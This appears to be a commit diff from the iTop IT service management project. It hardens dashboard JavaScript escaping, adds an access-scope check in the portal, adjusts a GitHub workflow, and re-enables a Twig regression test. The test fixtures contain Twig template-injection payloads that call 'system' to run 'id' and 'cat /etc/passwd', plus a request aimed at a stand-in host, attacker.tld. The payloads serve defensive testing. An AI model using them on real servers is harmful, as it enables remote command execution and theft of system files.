N°7810 - renable test in ci

N°7810 - code hardening
Security hardening
2026-02-15 08:24:10 +01:00 · 2024-12-19 16:43:08 +01:00 · 2024-12-19 15:12:26 +01:00 · 2024-12-13 16:48:13 +01:00 · 2024-12-13 15:09:18 +01:00 · 2024-11-27 09:40:22 +01:00
7 changed files with 87 additions and 61 deletions
--- a/.github/workflows/action.yml
+++ b/.github/workflows/action.yml
@@ -10,7 +10,34 @@ jobs:
    name: Add PR to Combodo Project
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/add-to-project@v1.0.2
+      - name: Check if author is a member of the organization
+        id: check-membership
+        run: |
+          ORG="Combodo"
+          AUTHOR=$(jq -r .pull_request.user.login "$GITHUB_EVENT_PATH")
+          RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" -H "Authorization: token ${{ secrets.PR_AUTOMATICALLY_ADD_TO_PROJECT }}" \
+            "https://api.github.com/orgs/$ORG/members/$AUTHOR")
+          if [ "$RESPONSE" == "404" ]; then
+            echo "project_url=https://github.com/orgs/Combodo/projects/5" >> $GITHUB_ENV
+            echo "is_member=false" >> $GITHUB_ENV
+          else
+            echo "project_url=https://github.com/orgs/Combodo/projects/4" >> $GITHUB_ENV
+            echo "is_member=true" >> $GITHUB_ENV
+
+          fi
+
+      - name: Add internal tag if member
+        if: env.is_member == 'true'
+        run: |
+          curl -X POST -H "Authorization: token ${{ secrets.PR_AUTOMATICALLY_ADD_TO_PROJECT }}" \
+            -H "Accept: application/vnd.github.v3+json" \
+            https://api.github.com/repos/Combodo/iTop/issues/${{ github.event.pull_request.number }}/labels \
+            -d '{"labels":["internal"]}'
+        env:
+          is_member: ${{ env.is_member }}
+
+      - name: Add PR to the appropriate project
+        uses: actions/add-to-project@v1.0.2
        with:
-          project-url: https://github.com/orgs/Combodo/projects/5
-          github-token: ${{ secrets.PR_AUTOMATICALLY_ADD_TO_PROJECT }}
+          project-url: ${{ env.project_url }}
+          github-token: ${{ secrets.PR_AUTOMATICALLY_ADD_TO_PROJECT }}
--- a/application/dashboard.class.inc.php
+++ b/application/dashboard.class.inc.php
@@ -1193,12 +1193,12 @@ EOF
 		$sOkButtonLabel = Dict::S('UI:Button:Save');
 		$sCancelButtonLabel = Dict::S('UI:Button:Cancel');
 		
-		$sId = utils::HtmlEntities($this->sId);
-		$sLayoutClass = utils::HtmlEntities($this->sLayoutClass);
+		$sId = json_encode($this->sId);
+		$sLayoutClass = json_encode($this->sLayoutClass);
 		$sAutoReload = $this->bAutoReload ? 'true' : 'false';
 		$sAutoReloadSec = (string) $this->iAutoReloadSec;
-		$sTitle = utils::HtmlEntities($this->sTitle);
-		$sFile = utils::HtmlEntities($this->GetDefinitionFile());
+		$sTitle = json_encode($this->sTitle);
+		$sFile = json_encode($this->GetDefinitionFile());
 		$sUrl = utils::GetAbsoluteUrlAppRoot().'pages/ajax.render.php';
 		$sReloadURL = $this->GetReloadURL();

@@ -1250,15 +1250,15 @@ $('#dashboard_editor').dialog({
 });

 $('#dashboard_editor .ui-layout-center').runtimedashboard({
-	dashboard_id: '$sId', 
-	layout_class: '$sLayoutClass', 
-	title: '$sTitle',
+	dashboard_id: $sId, 
+	layout_class: $sLayoutClass, 
+	title: $sTitle,
 	auto_reload: $sAutoReload, 
 	auto_reload_sec: $sAutoReloadSec,
 	submit_to: '$sUrl', 
-	submit_parameters: {operation: 'save_dashboard', file: '$sFile', extra_params: $sJSExtraParams, reload_url: '$sReloadURL'},
+	submit_parameters: {operation: 'save_dashboard', file: $sFile, extra_params: $sJSExtraParams, reload_url: '$sReloadURL'},
 	render_to: '$sUrl', 
-	render_parameters: {operation: 'render_dashboard', file: '$sFile', extra_params: $sJSExtraParams, reload_url: '$sReloadURL'},
+	render_parameters: {operation: 'render_dashboard', file: $sFile, extra_params: $sJSExtraParams, reload_url: '$sReloadURL'},
 	new_dashlet_parameters: {operation: 'new_dashlet'}
 });

--- a/datamodels/2.x/itop-portal-base/portal/src/Controller/ObjectController.php
+++ b/datamodels/2.x/itop-portal-base/portal/src/Controller/ObjectController.php
@@ -1246,7 +1246,12 @@ class ObjectController extends BrickController
 		$bIgnoreSilos = $oScopeValidator->IsAllDataAllowedForScope(UserRights::ListProfiles(), $sObjectClass);
 		$aParams = array('objects_id' => $aObjectIds);
 		$oSearch = DBObjectSearch::FromOQL("SELECT $sObjectClass WHERE id IN (:objects_id)");
-		if ($bIgnoreSilos === true)
+        if (!$oScopeValidator->AddScopeToQuery($oSearch, $sObjectClass)
+        ) {
+            IssueLog::Warning(__METHOD__ . ' at line ' . __LINE__ . ' : User #' . UserRights::GetUserId() . ' not allowed to read ' . $sObjectClass . ' object.');
+            throw new HttpException(Response::HTTP_NOT_FOUND, Dict::S('UI:ObjectDoesNotExist'));
+        }
+        if ($bIgnoreSilos === true)
 		{
 			$oSearch->AllowAllData();
 		}
--- a/tests/php-unit-tests/phpunit.xml.dist
+++ b/tests/php-unit-tests/phpunit.xml.dist
@@ -41,7 +41,9 @@
    <testsuite name="Setup">
      <directory>unitary-tests/setup</directory>
    </testsuite>
-    <!-- Note: The unitary-tests/sources/application/TwigBase is omitted for now as the test is not working -->
+    <testsuite name="SourcesApplicationTwigBase">
+      <directory>unitary-tests/sources/application/TwigBase</directory>
+    </testsuite>
    <testsuite name="SourcesApplicationSearch">
      <directory>unitary-tests/sources/application/search</directory>
    </testsuite>
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
@@ -1,58 +1,44 @@
 <?php
-namespace Combodo\iTop\Test\UnitTest;
+
+namespace Combodo\iTop\Test\UnitTest\Application\TwigBase;

 use Combodo\iTop\Portal\Twig\AppExtension;
-use Twig_Environment;
-use Twig_Loader_Array;
+use Combodo\iTop\Test\UnitTest\ItopDataTestCase;
+use Twig\Environment;
+use Twig\Loader\FilesystemLoader;

-/**
- * @runTestsInSeparateProcesses
- * @preserveGlobalState disabled
- * @backupGlobals disabled
- */
 class TwigTest extends ItopDataTestCase
 {
-	protected function setUp(): void
-	{
-		parent::setUp();
-		$this->RequireOnceItopFile('core/config.class.inc.php');
-	}
+    protected function setUp(): void
+    {
+        parent::setUp();
+        $this->RequireOnceItopFile('core/config.class.inc.php');
+    }

-	/**
-	 * Test the fix for ticket N°4384
-	 *
-	 * @dataProvider TemplateProvider
-	 *
-	 */
-	public function testTemplate($sFileName, $sExpected)
-	{
-		$sId = 'TestTwig';
-		$oAppExtension = new AppExtension();
+    /**
+     * @covers N°4384 N°7810
+     *
+     */
+    public function testTemplate()
+    {
+        // Creating sandbox twig env. to load and test the custom form template
+        $oTwig = new Environment(new FilesystemLoader(__DIR__.'/'));

-		// Creating sandbox twig env. to load and test the custom form template
-		$oTwig = new Twig_Environment(new Twig_Loader_Array([$sId => $sFileName]));
+        // Manually registering filters and functions as we didn't find how to do it automatically
+        $oAppExtension = new AppExtension();
+        $aFilters = $oAppExtension->getFilters();
+        foreach ($aFilters as $oFilter)
+        {
+            $oTwig->addFilter($oFilter);
+        }
+        $aFunctions = $oAppExtension->getFunctions();
+        foreach ($aFunctions as $oFunction)
+        {
+            $oTwig->addFunction($oFunction);
+        }

-		// Manually registering filters and functions as we didn't find how to do it automatically
-		$aFilters = $oAppExtension->getFilters();
-		foreach ($aFilters as $oFilter)
-		{
-			$oTwig->addFilter($oFilter);
-		}
-		$aFunctions = $oAppExtension->getFunctions();
-		foreach ($aFunctions as $oFunction)
-		{
-			$oTwig->addFunction($oFunction);
-		}
-	}
+        $sOutput = $oTwig->render('test.html.twig');

-	public static function testTemplateProvider()
-	{
-		$aReturn = array();
-		$aReturn['filter_system'] = [
-				'sFileName' => 'test.html',
-				'expected' =>file_get_contents(dirname(__FILE__).'/test.html'),
-			];
-
-		return $aReturn;
-	}
+        $this->assertEquals(file_get_contents(__DIR__.'/test.html'), $sOutput);
+    }
 }
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
@@ -42,5 +42,8 @@ Smith, Dupond
 <div>['echo',1]|sort('system')|join</div>
 echo1

+<div>[['id','']|sort('system')</div>
+id
+
 POST /subscribe?0=cat+/etc/passwd HTTP/1.1
 email=""@attacker.tld
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
@@ -47,5 +47,8 @@
 <div>['echo',1]|sort('system')|join</div>
 {{ ['echo',1]|sort('system')|join }}

+<div>[['id','']|sort('system')</div>
+{{['id','']|sort('system')|join}}
+
 POST /subscribe?0=cat+/etc/passwd HTTP/1.1
 email="{{ app.request.query.filter(0,0,1024,{'options':'system'}) }}"@attacker.tld
Author	SHA1	Message	Date
odain	a14bc3a31a	N°7810 - renable test in ci	2024-12-19 16:43:08 +01:00
Eric Espie	927a77b905	N°7810 - code hardening	2024-12-19 15:12:26 +01:00
jf-cbd	95aa444ee6	Security hardening	2024-12-13 16:48:13 +01:00
jf-cbd	f5de808c7c	Security hardening (#685 ) * security hardening	2024-12-13 15:09:18 +01:00
Benjamin Dalsass	e03033ce52	N°7219 - Fatal error following dashboard modification when dashboard title contains an é	2024-11-27 09:40:22 +01:00
jf-cbd	374b35f78a	🚀 Fix GitHub action	2024-11-07 14:50:46 +01:00
jf-cbd	04bd8cc5ce	🚀 Update GitHub actions to improve PR classification	2024-10-22 16:07:47 +02:00